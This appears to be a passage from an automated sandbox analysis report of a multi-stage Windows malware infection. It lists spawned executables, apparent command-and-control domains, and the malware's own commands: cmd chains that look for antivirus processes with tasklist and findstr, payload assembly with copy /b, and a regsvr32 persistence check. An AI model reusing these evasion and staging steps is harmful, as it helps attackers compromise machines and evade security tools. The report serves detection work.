Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 7_2_0005652B mov eax, dword ptr fs:[00000030h] | 7_2_0005652B
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe | Memory protected: page guard

                            HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: ES0PERDCSSGNQK1XTMK282189FFMR8.exe PID: 7892, type: MEMORYSTR
Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmp | String found in binary or memory: finickypwk.lat
Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmp | String found in binary or memory: shoefeatthe.lat
Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmp | String found in binary or memory: savorraiykj.lat
Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmp | String found in binary or memory: kickykiduz.lat
Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmp | String found in binary or memory: miniatureyu.lat
Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmp | String found in binary or memory: leggelatez.lat
Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmp | String found in binary or memory: washyceehsu.lat
Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmp | String found in binary or memory: bloodyswif.lat
Source: df1b740bf8.exe, 0000001E.00000002.2058753213.0000000000231000.00000040.00000001.01000000.00000015.sdmp | String found in binary or memory: breakfasutwy.cyou
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe "C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe "C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe "C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe "C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe "C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Geographic
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 36469
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Geographic
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TEAMS" Mw
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Avoiding.com L
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp | Process created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: Avoiding.com, 0000001C.00000000.1976078719.0000000000493000.00000002.00000001.01000000.00000014.sdmp, Macromedia.com, 00000033.00000003.2233001765.00000000039A1000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000033.00000000.2215472486.00000000004D3000.00000002.00000001.01000000.00000020.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1533901037.0000000000A69000.00000040.00000001.01000000.00000006.sdmp | Binary or memory string: PVProgram Manager
Source: ktIplF5.exe, 0000000F.00000002.2103984624.0000000000A17000.00000040.00000001.01000000.00000011.sdmp | Binary or memory string: nProgram Manager
Source: BEB973FPO2R62ZWABVOVP8TC.exe, BEB973FPO2R62ZWABVOVP8TC.exe, 00000006.00000002.1548691623.0000000000D37000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, skotes.exe, 00000007.00000002.1588235987.0000000000257000.00000040.00000001.01000000.0000000A.sdmp | Binary or memory string: Program Manager
Source: df1b740bf8.exe, 0000001E.00000002.2059698305.0000000000417000.00000040.00000001.01000000.00000015.sdmp | Binary or memory string: \Program Manager
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062125001\4ee3234999.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062125001\4ee3234999.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062126001\a6c5834e2f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062126001\a6c5834e2f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062127001\62950fb3a8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062127001\62950fb3a8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062128101\9673a0a47c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062128101\9673a0a47c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062129021\am_no.cmd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1062129021\am_no.cmd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
